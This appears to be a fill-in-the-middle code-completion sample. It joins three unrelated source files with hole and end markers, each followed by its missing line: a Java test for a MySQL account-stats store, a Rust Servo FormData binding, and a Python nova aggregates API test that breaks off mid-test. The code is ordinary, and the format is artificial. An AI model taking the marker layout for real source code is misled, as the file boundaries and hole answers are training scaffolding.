new ContainerStorageStats.Builder(origin).logicalStorageUsage(origin.getLogicalStorageUsage() + 1).build());
aggregatedAccountStorageStats = new AggregatedAccountStorageStats(newStorageStatsMap);
mySqlStore.storeAggregatedAccountStorageStats(aggregatedAccountStorageStats);
obtainedStats = mySqlStore.queryAggregatedAccountStorageStats();
assertEquals(newStorageStatsMap, obtainedStats.getStorageStats());
// Delete account and container
newStorageStatsMap = new HashMap<>(aggregatedAccountStorageStats.getStorageStats());
newStorageStatsMap.remove((short) 1);
newStorageStatsMap.get((short) 2).remove((short) 1);
// Now remove all containers for account 1 and container 1 of account 2
for (short containerId : aggregatedAccountStorageStats.getStorageStats().get((short) 1).keySet()) {
mySqlStore.deleteAggregatedAccountStatsForContainer((short) 1, containerId);
}
mySqlStore.deleteAggregatedAccountStatsForContainer((short) 2, (short) 1);
obtainedStats = mySqlStore.queryAggregatedAccountStorageStatsByClusterName(clusterName1);
assertEquals(newStorageStatsMap, obtainedStats.getStorageStats());
mySqlStore.shutdown();
}
/**
* Test methods to store, delete and fetch monthly aggregated stats
* @throws Exception
*/
@Test
public void testMonthlyAggregatedStats() throws Exception {
String monthValue = "2020-01";
AggregatedAccountStorageStats currentAggregatedStats = mySqlStore.queryAggregatedAccountStorageStats();
if (currentAggregatedStats.getStorageStats().size() == 0) {
AggregatedAccountStorageStats aggregatedAccountStorageStats = new AggregatedAccountStorageStats(
StorageStatsUtilTest.generateRandomAggregatedAccountStorageStats((short) 0, 10, 10, 10000L, 2, 10));
mySqlStore.storeAggregatedAccountStorageStats(aggregatedAccountStorageStats);
currentAggregatedStats = mySqlStore.queryAggregatedAccountStorageStats();
}
// Fetch the month; it should return an empty string
Assert.assertEquals("", mySqlStore.queryRecordedMonth());
mySqlStore.takeSnapshotOfAggregatedAccountStatsAndUpdateMonth(monthValue);
Map<String, Map<String, Long>> monthlyContainerStorageUsages = mySqlStore.queryMonthlyAggregatedAccountStats(false);
assertEquals(StorageStatsUtil.convertAggregatedAccountStorageStatsToMap(currentAggregatedStats, false),
monthlyContainerStorageUsages);
String obtainedMonthValue = mySqlStore.queryRecordedMonth();
assertTrue(obtainedMonthValue.equals(monthValue));
// Change the value and store it back to mysql database
monthValue = "2020-02";
currentAggregatedStats = new AggregatedAccountStorageStats(
StorageStatsUtilTest.generateRandomAggregatedAccountStorageStats((short) 0, 10, 10, 10000L, 2, 10));
mySqlStore.storeAggregatedAccountStorageStats(currentAggregatedStats);
mySqlStore.takeSnapshotOfAggregatedAccountStatsAndUpdateMonth(monthValue);
monthlyContainerStorageUsages = mySqlStore.queryMonthlyAggregatedAccountStats(false);
assertEquals(StorageStatsUtil.convertAggregatedAccountStorageStatsToMap(currentAggregatedStats, false),
monthlyContainerStorageUsages);
obtainedMonthValue = mySqlStore.queryRecordedMonth();
assertTrue(obtainedMonthValue.equals(monthValue));
// Delete the snapshots
mySqlStore.deleteSnapshotOfAggregatedAccountStats();
assertTrue(mySqlStore.queryMonthlyAggregatedAccountStats(false).isEmpty());
}
/**
* Test methods to store and fetch partition class stats and the partition name to partition id mapping.
* @throws Exception
*/
@Test
public void testHostPartitionClassStats() throws Exception {
// First write some stats to account reports
testMultiStoreStats();
StatsWrapper accountStats1 = mySqlStore.queryAccountStatsByHost(hostname1, port1);
StatsWrapper accountStats2 = mySqlStore.queryAccountStatsByHost(hostname2, port2);
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
StatsWrapper accountStats3 = mySqlStore3.queryAccountStatsByHost(hostname3, port3);
// From these account stats, create partition class stats.
Set<String> allPartitionKeys = new HashSet<String>() {
{
addAll(accountStats1.getSnapshot().getSubMap().keySet());
addAll(accountStats2.getSnapshot().getSubMap().keySet());
addAll(accountStats3.getSnapshot().getSubMap().keySet());
}
};
List<String> partitionClassNames = Arrays.asList("default", "new");
Map<String, String> partitionKeyToClassName = new HashMap<>();
int ind = 0;
for (String partitionKey : allPartitionKeys) {
partitionKeyToClassName.put(partitionKey, partitionClassNames.get(ind % partitionClassNames.size()));
ind++;
}
StatsWrapper partitionClassStats1 =
convertAccountStatsToPartitionClassStats(accountStats1, partitionKeyToClassName);
StatsWrapper partitionClassStats2 =
convertAccountStatsToPartitionClassStats(accountStats2, partitionKeyToClassName);
StatsWrapper partitionClassStats3 =
convertAccountStatsToPartitionClassStats(accountStats3, partitionKeyToClassName);
mySqlStore.storePartitionClassStats(partitionClassStats1);
mySqlStore.storePartitionClassStats(partitionClassStats2);
mySqlStore3.storePartitionClassStats(partitionClassStats3);
Map<String, Set<Integer>> partitionNameAndIds = mySqlStore.queryPartitionNameAndIds();
assertEquals(new HashSet<>(partitionClassNames), partitionNameAndIds.keySet());
Map<String, String> dbPartitionKeyToClassName = partitionNameAndIds.entrySet()
.stream()
.flatMap(
ent -> ent.getValue().stream().map(pid -> new Pair<String, String>(ent.getKey(), "Partition[" + pid + "]")))
.collect(Collectors.toMap(Pair::getSecond, Pair::getFirst));
assertEquals(partitionKeyToClassName, dbPartitionKeyToClassName);
StatsWrapper obtainedStats1 = mySqlStore.queryPartitionClassStatsByHost(hostname1, port1, partitionNameAndIds);
assertEquals(partitionClassStats1.getSnapshot(), obtainedStats1.getSnapshot());
StatsWrapper obtainedStats2 = mySqlStore.queryPartitionClassStatsByHost(hostname2, port2, partitionNameAndIds);
assertEquals(partitionClassStats2.getSnapshot(), obtainedStats2.getSnapshot());
StatsWrapper obtainedStats3 = mySqlStore3.queryPartitionClassStatsByHost(hostname3, port3, partitionNameAndIds);
assertEquals(partitionClassStats3.getSnapshot(), obtainedStats3.getSnapshot());
mySqlStore3.shutdown();
}
/**
* Test methods to store and fetch partition class storage stats and the partition name to partition id mapping.
* @throws Exception
*/
@Test
public void testHostPartitionClassStorageStats() throws Exception {
// First write some stats to account reports
testMultiStoreStats();
HostAccountStorageStatsWrapper accountStats1 = mySqlStore.queryHostAccountStorageStatsByHost(hostname1, port1);
HostAccountStorageStatsWrapper accountStats2 = mySqlStore.queryHostAccountStorageStatsByHost(hostname2, port2);
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
HostAccountStorageStatsWrapper accountStats3 = mySqlStore3.queryHostAccountStorageStatsByHost(hostname3, port3);
// From these account stats, create partition class storage stats.
Set<Long> allPartitionKeys = new HashSet<Long>() {
{
addAll(accountStats1.getStats().getStorageStats().keySet());
addAll(accountStats2.getStats().getStorageStats().keySet());
addAll(accountStats3.getStats().getStorageStats().keySet());
}
};
List<String> partitionClassNames = Arrays.asList("default", "new");
Map<Long, String> partitionIdToClassName = new HashMap<>();
int ind = 0;
for (long partitionId : allPartitionKeys) {
partitionIdToClassName.put(partitionId, partitionClassNames.get(ind % partitionClassNames.size()));
ind++;
}
HostPartitionClassStorageStatsWrapper partitionClassStats1 =
convertHostAccountStorageStatsToHostPartitionClassStorageStats(accountStats1, partitionIdToClassName);
HostPartitionClassStorageStatsWrapper partitionClassStats2 =
convertHostAccountStorageStatsToHostPartitionClassStorageStats(accountStats2, partitionIdToClassName);
HostPartitionClassStorageStatsWrapper partitionClassStats3 =
convertHostAccountStorageStatsToHostPartitionClassStorageStats(accountStats3, partitionIdToClassName);
mySqlStore.storeHostPartitionClassStorageStats(partitionClassStats1);
mySqlStore.storeHostPartitionClassStorageStats(partitionClassStats2);
mySqlStore3.storeHostPartitionClassStorageStats(partitionClassStats3);
Map<String, Set<Integer>> partitionNameAndIds = mySqlStore.queryPartitionNameAndIds();
assertEquals(new HashSet<>(partitionClassNames), partitionNameAndIds.keySet());
Map<Long, String> dbPartitionKeyToClassName = partitionNameAndIds.entrySet()
.stream()
.flatMap(ent -> ent.getValue().stream().map(pid -> new Pair<>(ent.getKey(), (long) pid)))
.collect(Collectors.toMap(Pair::getSecond, Pair::getFirst));
assertEquals(partitionIdToClassName, dbPartitionKeyToClassName);
// Fetch HostPartitionClassStorageStats
HostPartitionClassStorageStatsWrapper obtainedStats1 =
mySqlStore.queryHostPartitionClassStorageStatsByHost(hostname1, port1, partitionNameAndIds);
assertEquals(partitionClassStats1.getStats().getStorageStats(), obtainedStats1.getStats().getStorageStats());
HostPartitionClassStorageStatsWrapper obtainedStats2 =
mySqlStore.queryHostPartitionClassStorageStatsByHost(hostname2, port2, partitionNameAndIds);
assertEquals(partitionClassStats2.getStats().getStorageStats(), obtainedStats2.getStats().getStorageStats());
HostPartitionClassStorageStatsWrapper obtainedStats3 =
mySqlStore3.queryHostPartitionClassStorageStatsByHost(hostname3, port3, partitionNameAndIds);
assertEquals(partitionClassStats3.getStats().getStorageStats(), obtainedStats3.getStats().getStorageStats());
// Fetch StatsSnapshot
StatsWrapper obtainedStats = mySqlStore.queryPartitionClassStatsByHost(hostname1, port1, partitionNameAndIds);
assertEquals(
StorageStatsUtil.convertHostPartitionClassStorageStatsToStatsSnapshot(obtainedStats1.getStats(), false),
obtainedStats.getSnapshot());
mySqlStore3.shutdown();
}
/**
* Test methods to store, delete and fetch aggregated partition class stats.
* @throws Exception
*/
@Test
public void testAggregatedPartitionClassStats() throws Exception {
testHostPartitionClassStats();
Map<String, Set<Integer>> partitionNameAndIds = mySqlStore.queryPartitionNameAndIds();
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
// Now we should have partition class names and partition ids in database
// Construct an aggregated partition class report
StatsSnapshot aggregated =
TestUtils.makeAggregatedPartitionClassStats(partitionNameAndIds.keySet().toArray(new String[0]), 10, 10);
mySqlStore.storeAggregatedPartitionClassStats(aggregated);
partitionNameAndIds = mySqlStore3.queryPartitionNameAndIds();
StatsSnapshot aggregated3 =
TestUtils.makeAggregatedPartitionClassStats(partitionNameAndIds.keySet().toArray(new String[0]), 10, 10);
mySqlStore3.storeAggregatedPartitionClassStats(aggregated3);
StatsSnapshot obtained = mySqlStore.queryAggregatedPartitionClassStats();
assertEquals(aggregated, obtained);
assertEquals(mySqlStore.queryAggregatedPartitionClassStatsByClusterName("random-cluster").getSubMap().size(), 0);
StatsSnapshot obtained3 = mySqlStore3.queryAggregatedPartitionClassStats();
assertEquals(aggregated3, obtained3);
// Change one value and store it to mysql database again
StatsSnapshot newSnapshot = new StatsSnapshot(aggregated);
newSnapshot.getSubMap()
.get("default")
.getSubMap()
.get(Utils.partitionClassStatsAccountContainerKey((short) 1, (short) 1))
.setValue(1);
newSnapshot.updateValue();
mySqlStore.storeAggregatedPartitionClassStats(newSnapshot);
obtained = mySqlStore.queryAggregatedPartitionClassStats();
assertEquals(newSnapshot, obtained);
// Delete some account and container
newSnapshot = new StatsSnapshot(newSnapshot);
short accountId = (short) 1;
short containerId = (short) 1;
String accountContainerKey = Utils.partitionClassStatsAccountContainerKey(accountId, containerId);
for (String partitionClassName : partitionNameAndIds.keySet()) {
mySqlStore.deleteAggregatedPartitionClassStatsForAccountContainer(partitionClassName, accountId, containerId);
newSnapshot.getSubMap().get(partitionClassName).getSubMap().remove(accountContainerKey);
}
newSnapshot.updateValue();
obtained = mySqlStore.queryAggregatedPartitionClassStats();
assertEquals(newSnapshot, obtained);
mySqlStore3.shutdown();
}
@Test
public void testAggregatedPartitionClassStorageStats() throws Exception {
testHostPartitionClassStorageStats();
Map<String, Set<Integer>> partitionNameAndIds = mySqlStore.queryPartitionNameAndIds();
AccountStatsMySqlStore mySqlStore3 = createAccountStatsMySqlStore(clusterName2, hostname3, port3);
// Now we should have partition class names and partition ids in database
// Construct an aggregated partition class report
AggregatedPartitionClassStorageStats aggregatedStats = new AggregatedPartitionClassStorageStats(
StorageStatsUtilTest.generateRandomAggregatedPartitionClassStorageStats(
partitionNameAndIds.keySet().toArray(new String[0]), (short) 0, 10, 10, 10000L, 2, 10));
mySqlStore.storeAggregatedPartitionClassStorageStats(aggregatedStats);
partitionNameAndIds = mySqlStore3.queryPartitionNameAndIds();
AggregatedPartitionClassStorageStats aggregatedStats3 = new AggregatedPartitionClassStorageStats(
StorageStatsUtilTest.generateRandomAggregatedPartitionClassStorageStats(
partitionNameAndIds.keySet().toArray(new String[0]), (short) 0, 10, 10, 10000L, 2, 10));
mySqlStore3.storeAggregatedPartitionClassStorageStats(aggregatedStats3);
AggregatedPartitionClassStorageStats obtained = mySqlStore.queryAggregatedPartitionClassStorageStats();
assertEquals(aggregatedStats.getStorageStats(), obtained.getStorageStats());
assertEquals(
mySqlStore.queryAggregatedPartitionClassStorageStatsByClusterName("random-cluster").getStorageStats().size(),
0);
AggregatedPartitionClassStorageStats obtained3 = mySqlStore3.queryAggregatedPartitionClassStorageStats();
assertEquals(aggregatedStats3.getStorageStats(), obtained3.getStorageStats());
// Fetch StatsSnapshot
StatsSnapshot obtainedSnapshot = mySqlStore.queryAggregatedPartitionClassStats();
assertEquals(StorageStatsUtil.convertAggregatedPartitionClassStorageStatsToStatsSnapshot(obtained, false),
obtainedSnapshot);
// Change one value and store it to mysql database again
Map<String, Map<Short, Map<Short, ContainerStorageStats>>> newStorageStatsMap =
new HashMap<>(aggregatedStats.getStorageStats());
ContainerStorageStats origin = newStorageStatsMap.get("default").get((short) 1).get((short) 1);
newStorageStatsMap.get("default")
.get((short) 1)
.put((short) 1,
new ContainerStorageStats.Builder(origin).logicalStorageUsage(origin.getLogicalStorageUsage() + 1).build());
mySqlStore.storeAggregatedPartitionClassStorageStats(new AggregatedPartitionClassStorageStats(newStorageStatsMap));
obtained = mySqlStore.queryAggregatedPartitionClassStorageStats();
assertEquals(newStorageStatsMap, obtained.getStorageStats());
// Delete some account and container
short accountId = (short) 1;
short containerId = (short) 1;<|fim▁hole|> mySqlStore.deleteAggregatedPartitionClassStatsForAccountContainer(partitionClassName, accountId, containerId);
newStorageStatsMap.get(partitionClassName).get(accountId).remove(containerId);
}
obtained = mySqlStore.queryAggregatedPartitionClassStorageStats();
assertEquals(newStorageStatsMap, obtained.getStorageStats());
mySqlStore3.shutdown();
}
private AccountStatsMySqlStore createAccountStatsMySqlStore(String clusterName, String hostname, int port)
throws Exception {
Path localBackupFilePath = createTemporaryFile();
Properties configProps = Utils.loadPropsFromResource("accountstats_mysql.properties");
configProps.setProperty(ClusterMapConfig.CLUSTERMAP_CLUSTER_NAME, clusterName);
configProps.setProperty(ClusterMapConfig.CLUSTERMAP_HOST_NAME, hostname);
configProps.setProperty(ClusterMapConfig.CLUSTERMAP_DATACENTER_NAME, "dc1");
configProps.setProperty(ClusterMapConfig.CLUSTERMAP_PORT, String.valueOf(port));
configProps.setProperty(AccountStatsMySqlConfig.DOMAIN_NAMES_TO_REMOVE, ".github.com");
configProps.setProperty(AccountStatsMySqlConfig.UPDATE_BATCH_SIZE, String.valueOf(batchSize));
configProps.setProperty(AccountStatsMySqlConfig.POOL_SIZE, String.valueOf(5));
configProps.setProperty(AccountStatsMySqlConfig.LOCAL_BACKUP_FILE_PATH, localBackupFilePath.toString());
VerifiableProperties verifiableProperties = new VerifiableProperties(configProps);
return (AccountStatsMySqlStore) new AccountStatsMySqlStoreFactory(verifiableProperties,
new ClusterMapConfig(verifiableProperties), new MetricRegistry()).getAccountStatsStore();
}
private static Path createTemporaryFile() throws IOException {
Path tempDir = Files.createTempDirectory("AccountStatsMySqlStoreTest");
return tempDir.resolve("localbackup");
}
private static StatsWrapper generateStatsWrapper(int numPartitions, int numAccounts, int numContainers,
StatsReportType reportType) {
Random random = new Random();
List<StatsSnapshot> storeSnapshots = new ArrayList<>();
for (int i = 0; i < numPartitions; i++) {
storeSnapshots.add(TestUtils.generateStoreStats(numAccounts, numContainers, random, reportType));
}
return TestUtils.generateNodeStats(storeSnapshots, 1000, reportType);
}
private static HostAccountStorageStatsWrapper generateHostAccountStorageStatsWrapper(int numPartitions,
int numAccounts, int numContainersPerAccount, StatsReportType reportType) {
HostAccountStorageStats hostAccountStorageStats = new HostAccountStorageStats(
StorageStatsUtilTest.generateRandomHostAccountStorageStats(numPartitions, numAccounts, numContainersPerAccount,
100000L, 2, 10));
StatsHeader statsHeader =
new StatsHeader(StatsHeader.StatsDescription.STORED_DATA_SIZE, 1000, numPartitions, numPartitions,
Collections.emptyList());
return new HostAccountStorageStatsWrapper(statsHeader, hostAccountStorageStats);
}
private void assertTableSize(AccountStatsMySqlStore mySqlStore, int expectedNumRows) throws SQLException {
int numRows = 0;
try (Connection connection = mySqlStore.getDataSource().getConnection()) {
try (Statement statement = connection.createStatement()) {
try (ResultSet resultSet = statement.executeQuery("SELECT * FROM " + AccountReportsDao.ACCOUNT_REPORTS_TABLE)) {
while (resultSet.next()) {
numRows++;
}
}
}
}
assertEquals(expectedNumRows, numRows);
}
private void assertTwoStatsSnapshots(StatsSnapshot snapshot1, StatsSnapshot snapshot2) {
assertEquals("Snapshot values are not equal", snapshot1.getValue(), snapshot2.getValue());
if (snapshot1.getSubMap() == null) {
assertNull(snapshot2.getSubMap());
} else {
assertEquals("Snapshot submap size mismatch", snapshot1.getSubMap().size(), snapshot2.getSubMap().size());
for (String key : snapshot1.getSubMap().keySet()) {
assertTrue(snapshot2.getSubMap().containsKey(key));
assertTwoStatsSnapshots(snapshot1.getSubMap().get(key), snapshot2.getSubMap().get(key));
}
}
}
private StatsWrapper convertAccountStatsToPartitionClassStats(StatsWrapper accountStats,
Map<String, String> partitionKeyToClassName) {
Map<String, StatsSnapshot> partitionClassSubMap = new HashMap<>();
StatsSnapshot originHostStats = accountStats.getSnapshot();
for (String partitionKey : originHostStats.getSubMap().keySet()) {
StatsSnapshot originPartitionStats = originHostStats.getSubMap().get(partitionKey);
String currentClassName = partitionKeyToClassName.get(partitionKey);
StatsSnapshot partitionClassStats =
partitionClassSubMap.computeIfAbsent(currentClassName, k -> new StatsSnapshot(0L, new HashMap<>()));
Map<String, StatsSnapshot> accountContainerSubMap = new HashMap<>();
for (String accountKey : originPartitionStats.getSubMap().keySet()) {
for (Map.Entry<String, StatsSnapshot> containerEntry : originPartitionStats.getSubMap()
.get(accountKey)
.getSubMap()
.entrySet()) {
String containerKey = containerEntry.getKey();
StatsSnapshot containerStats = new StatsSnapshot(containerEntry.getValue());
String accountContainerKey =
Utils.partitionClassStatsAccountContainerKey(Utils.accountIdFromStatsAccountKey(accountKey),
Utils.containerIdFromStatsContainerKey(containerKey));
accountContainerSubMap.put(accountContainerKey, containerStats);
}
}
long accountContainerValue = accountContainerSubMap.values().stream().mapToLong(StatsSnapshot::getValue).sum();
StatsSnapshot partitionStats = new StatsSnapshot(accountContainerValue, accountContainerSubMap);
partitionClassStats.getSubMap().put(partitionKey, partitionStats);
partitionClassStats.setValue(partitionClassStats.getValue() + accountContainerValue);
}
return new StatsWrapper(new StatsHeader(accountStats.getHeader()),
new StatsSnapshot(originHostStats.getValue(), partitionClassSubMap));
}
private HostPartitionClassStorageStatsWrapper convertHostAccountStorageStatsToHostPartitionClassStorageStats(
HostAccountStorageStatsWrapper accountStatsWrapper, Map<Long, String> partitionIdToClassName) {
HostPartitionClassStorageStats hostPartitionClassStorageStats = new HostPartitionClassStorageStats();
Map<Long, Map<Short, Map<Short, ContainerStorageStats>>> storageStats =
accountStatsWrapper.getStats().getStorageStats();
for (long partitionId : storageStats.keySet()) {
Map<Short, Map<Short, ContainerStorageStats>> accountStorageStatsMap = storageStats.get(partitionId);
String partitionClassName = partitionIdToClassName.get(partitionId);
for (short accountId : accountStorageStatsMap.keySet()) {
accountStorageStatsMap.get(accountId)
.values()
.forEach(containerStats -> hostPartitionClassStorageStats.addContainerStorageStats(partitionClassName,
partitionId, accountId, containerStats));
}
}
return new HostPartitionClassStorageStatsWrapper(new StatsHeader(accountStatsWrapper.getHeader()),
hostPartitionClassStorageStats);
}
}<|fim▁end|> | for (String partitionClassName : partitionNameAndIds.keySet()) { |
<|file_name|>formdata.rs<|end_file_name|><|fim▁begin|>/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
use dom::bindings::utils::{Reflectable, Reflector, reflect_dom_object};
use dom::bindings::error::{Fallible};
use dom::bindings::codegen::FormDataBinding;
use dom::bindings::js::JS;
use dom::blob::Blob;
use dom::htmlformelement::HTMLFormElement;
use dom::window::Window;
use servo_util::str::DOMString;
use collections::hashmap::HashMap;
#[deriving(Encodable)]
pub enum FormDatum {
StringData(DOMString),
BlobData { blob: JS<Blob>, name: DOMString }
}
#[deriving(Encodable)]
pub struct FormData {
data: HashMap<DOMString, FormDatum>,
reflector_: Reflector,<|fim▁hole|> form: Option<JS<HTMLFormElement>>
}
impl FormData {
pub fn new_inherited(form: Option<JS<HTMLFormElement>>, window: JS<Window>) -> FormData {
FormData {
data: HashMap::new(),
reflector_: Reflector::new(),
window: window,
form: form
}
}
pub fn new(form: Option<JS<HTMLFormElement>>, window: &JS<Window>) -> JS<FormData> {
reflect_dom_object(~FormData::new_inherited(form, window.clone()), window, FormDataBinding::Wrap)
}
pub fn Constructor(window: &JS<Window>, form: Option<JS<HTMLFormElement>>)
-> Fallible<JS<FormData>> {
Ok(FormData::new(form, window))
}
pub fn Append(&mut self, name: DOMString, value: &JS<Blob>, filename: Option<DOMString>) {
let blob = BlobData {
blob: value.clone(),
name: filename.unwrap_or(~"default")
};
self.data.insert(name.clone(), blob);
}
pub fn Append_(&mut self, name: DOMString, value: DOMString) {
self.data.insert(name, StringData(value));
}
}
impl Reflectable for FormData {
fn reflector<'a>(&'a self) -> &'a Reflector {
&self.reflector_
}
fn mut_reflector<'a>(&'a mut self) -> &'a mut Reflector {
&mut self.reflector_
}
}<|fim▁end|> | window: JS<Window>, |
<|file_name|>test_aggregates.py<|end_file_name|><|fim▁begin|># Copyright (c) 2012 Citrix Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for the aggregates admin api."""
from webob import exc
from nova.api.openstack.compute.contrib import aggregates
from nova import context
from nova import exception
from nova import test
from nova.tests import matchers
AGGREGATE_LIST = [
{"name": "aggregate1", "id": "1", "availability_zone": "nova1"},
{"name": "aggregate2", "id": "2", "availability_zone": "nova1"},
{"name": "aggregate3", "id": "3", "availability_zone": "nova2"},
{"name": "aggregate1", "id": "4", "availability_zone": "nova1"}]
AGGREGATE = {"name": "aggregate1",
"id": "1",
"availability_zone": "nova1",
"metadata": {"foo": "bar"},
"hosts": ["host1, host2"]}
class FakeRequest(object):
environ = {"nova.context": context.get_admin_context()}
class AggregateTestCase(test.NoDBTestCase):
"""Test Case for aggregates admin api."""
def setUp(self):
super(AggregateTestCase, self).setUp()
self.controller = aggregates.AggregateController()
self.req = FakeRequest()
self.context = self.req.environ['nova.context']
def test_index(self):
def stub_list_aggregates(context):
if context is None:
raise Exception()
return AGGREGATE_LIST
self.stubs.Set(self.controller.api, 'get_aggregate_list',
stub_list_aggregates)
result = self.controller.index(self.req)
self.assertEqual(AGGREGATE_LIST, result["aggregates"])
def test_create(self):
def stub_create_aggregate(context, name, availability_zone):
self.assertEqual(context, self.context, "context")
self.assertEqual("test", name, "name")
self.assertEqual("nova1", availability_zone, "availability_zone")
return AGGREGATE
self.stubs.Set(self.controller.api, "create_aggregate",
stub_create_aggregate)
result = self.controller.create(self.req, {"aggregate":
{"name": "test",
"availability_zone": "nova1"}})
self.assertEqual(AGGREGATE, result["aggregate"])
def test_create_with_duplicate_aggregate_name(self):
def stub_create_aggregate(context, name, availability_zone):
raise exception.AggregateNameExists(aggregate_name=name)
self.stubs.Set(self.controller.api, "create_aggregate",
stub_create_aggregate)
self.assertRaises(exc.HTTPConflict, self.controller.create,
self.req, {"aggregate":
{"name": "test",
"availability_zone": "nova1"}})
def test_create_with_incorrect_availability_zone(self):
def stub_create_aggregate(context, name, availability_zone):
raise exception.InvalidAggregateAction(action='create_aggregate',
aggregate_id="'N/A'",
reason='invalid zone')
self.stubs.Set(self.controller.api, "create_aggregate",
stub_create_aggregate)
self.assertRaises(exception.InvalidAggregateAction,
self.controller.create,
self.req, {"aggregate":
{"name": "test",
"availability_zone": "nova_bad"}})
def test_create_with_no_aggregate(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, {"foo":
{"name": "test",
"availability_zone": "nova1"}})
def test_create_with_no_name(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, {"aggregate":
{"foo": "test",
"availability_zone": "nova1"}})
def test_create_with_no_availability_zone(self):
def stub_create_aggregate(context, name, availability_zone):
self.assertEqual(context, self.context, "context")
self.assertEqual("test", name, "name")
self.assertEqual(None, availability_zone, "availability_zone")
return AGGREGATE
self.stubs.Set(self.controller.api, "create_aggregate",
stub_create_aggregate)
result = self.controller.create(self.req,
{"aggregate": {"name": "test"}})
self.assertEqual(AGGREGATE, result["aggregate"])
def test_create_with_null_name(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, {"aggregate":
{"name": "",
"availability_zone": "nova1"}})
def test_create_with_name_too_long(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, {"aggregate":
{"name": "x" * 256,
"availability_zone": "nova1"}})
def test_create_with_extra_invalid_arg(self):
self.assertRaises(exc.HTTPBadRequest, self.controller.create,
self.req, dict(name="test",
availability_zone="nova1",
foo='bar'))
def test_show(self):
def stub_get_aggregate(context, id):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", id, "id")
return AGGREGATE
self.stubs.Set(self.controller.api, 'get_aggregate',
stub_get_aggregate)
aggregate = self.controller.show(self.req, "1")
self.assertEqual(AGGREGATE, aggregate["aggregate"])
def test_show_with_invalid_id(self):
def stub_get_aggregate(context, id):
raise exception.AggregateNotFound(aggregate_id=2)
self.stubs.Set(self.controller.api, 'get_aggregate',
stub_get_aggregate)
self.assertRaises(exc.HTTPNotFound,
self.controller.show, self.req, "2")
def test_update(self):
body = {"aggregate": {"name": "new_name",
"availability_zone": "nova1"}}
def stub_update_aggregate(context, aggregate, values):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
self.assertEqual(body["aggregate"], values, "values")
return AGGREGATE
self.stubs.Set(self.controller.api, "update_aggregate",
stub_update_aggregate)
result = self.controller.update(self.req, "1", body=body)
self.assertEqual(AGGREGATE, result["aggregate"])
def test_update_with_only_name(self):
body = {"aggregate": {"name": "new_name"}}
def stub_update_aggregate(context, aggregate, values):
return AGGREGATE
self.stubs.Set(self.controller.api, "update_aggregate",
stub_update_aggregate)
result = self.controller.update(self.req, "1", body=body)
self.assertEqual(AGGREGATE, result["aggregate"])
def test_update_with_only_availability_zone(self):
body = {"aggregate": {"availability_zone": "nova1"}}
def stub_update_aggregate(context, aggregate, values):
return AGGREGATE
self.stubs.Set(self.controller.api, "update_aggregate",
stub_update_aggregate)
result = self.controller.update(self.req, "1", body=body)
self.assertEqual(AGGREGATE, result["aggregate"])
def test_update_with_no_updates(self):
test_metadata = {"aggregate": {}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_no_update_key(self):
test_metadata = {"asdf": {}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_wrong_updates(self):
test_metadata = {"aggregate": {"status": "disable",
"foo": "bar"}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_null_name(self):
test_metadata = {"aggregate": {"name": ""}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_name_too_long(self):
test_metadata = {"aggregate": {"name": "x" * 256}}
self.assertRaises(exc.HTTPBadRequest, self.controller.update,
self.req, "2", body=test_metadata)
def test_update_with_bad_aggregate(self):
test_metadata = {"aggregate": {"name": "test_name"}}
def stub_update_aggregate(context, aggregate, metadata):
raise exception.AggregateNotFound(aggregate_id=2)
self.stubs.Set(self.controller.api, "update_aggregate",
stub_update_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.update,
self.req, "2", body=test_metadata)
def test_invalid_action(self):
body = {"append_host": {"host": "host1"}}
self.assertRaises(exc.HTTPBadRequest,
self.controller.action, self.req, "1", body=body)
def test_add_host(self):
def stub_add_host_to_aggregate(context, aggregate, host):
self.assertEqual(context, self.context, "context")
self.assertEqual("1", aggregate, "aggregate")
self.assertEqual("host1", host, "host")
return AGGREGATE
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
aggregate = self.controller.action(self.req, "1",
body={"add_host": {"host":
"host1"}})
self.assertEqual(aggregate["aggregate"], AGGREGATE)
def test_add_host_with_already_added_host(self):
def stub_add_host_to_aggregate(context, aggregate, host):
raise exception.AggregateHostExists(aggregate_id=aggregate,
host=host)
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
self.assertRaises(exc.HTTPConflict, self.controller.action,
self.req, "1",
body={"add_host": {"host": "host1"}})
def test_add_host_with_bad_aggregate(self):
def stub_add_host_to_aggregate(context, aggregate, host):
raise exception.AggregateNotFound(aggregate_id=aggregate)
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
self.assertRaises(exc.HTTPNotFound, self.controller.action,
self.req, "bogus_aggregate",
body={"add_host": {"host": "host1"}})
def test_add_host_with_bad_host(self):
def stub_add_host_to_aggregate(context, aggregate, host):
raise exception.ComputeHostNotFound(host=host)
self.stubs.Set(self.controller.api, "add_host_to_aggregate",
stub_add_host_to_aggregate)
